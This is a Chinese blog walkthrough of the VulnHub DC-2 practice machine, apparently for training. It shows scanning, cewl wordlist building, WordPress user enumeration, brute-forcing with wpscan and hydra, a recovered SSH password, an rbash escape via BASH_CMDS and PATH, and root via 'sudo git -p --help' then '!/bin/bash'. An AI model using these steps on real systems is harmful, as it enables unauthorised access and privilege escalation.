vulnhub-dc2

靶机地址

https://www.vulnhub.com/entry/dc-2,311/
打开靶机,设置为同一种nat模式
kali 信息收集主机发现

arp-scan -l

在这里插入图片描述
nmap扫描目标ip 192.168.1.132

nmap -sS -Pn -A -n -p-  192.168.1.132 

请添加图片描述

发现80端口开放,访问网址,发现无法访问

请添加图片描述

无法访问,可能是域名解析失败,在/etc/hosts更改域名和ip

请添加图片描述

登录网站信息收集,发现flag

请添加图片描述

根据分析页面分析,需要cewl爬取

cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行 工具 应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。

请添加图片描述

目录扫描 wpscan

wpscan --url dc-2 -e u  扫描账号

请添加图片描述

发现三个用户 admin, jerry,tom 创建用户字典

工具生成cewl密码字典

CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

请添加图片描述

工具wpscan 暴力破解账号密码

wpscan --url http://dc-2 -U use.list  -P pwd.dic 

成功爆破tom,Jerry密码

请添加图片描述

发现flag2 ,需要切换切入点

请添加图片描述

切换端口7744 ssh服务,工具hydra对已知的账号,对应字典破解

账号密码:tom parturient

请添加图片描述

账号登录ssh

ssh tom@192.168.1.132 -p 7744   

请添加图片描述

发现查看flag3.txt时权限受阻,-rbash

请添加图片描述

绕过rbash,拿到flag3.txt

BASH_CMDS[a]=/bin/sh;a  注:把/bin/bash给a变量`
export PATH=$PATH:/bin/    注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   注:将/usr/bin作为PATH环境变量导出

请添加图片描述

切换用户su Jerry ,尝试用web端爆破的密码,发现无法访问flag4.txt

请添加图片描述

git 提权

输入如下命令,会强制进入交互状态

sudo git -p --help

调用bash

!/bin/bash

请添加图片描述

参考链接

https://blog.csdn.net/weixin_43705814/article/details/111879362

https://blog.csdn.net/weixin_43870289/article/details/104125681

链接

https://blog.csdn.net/weixin_43705814/article/details/111879362

https://blog.csdn.net/weixin_43870289/article/details/104125681

https://blog.csdn.net/weixin_44288604/article/details/108032112

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值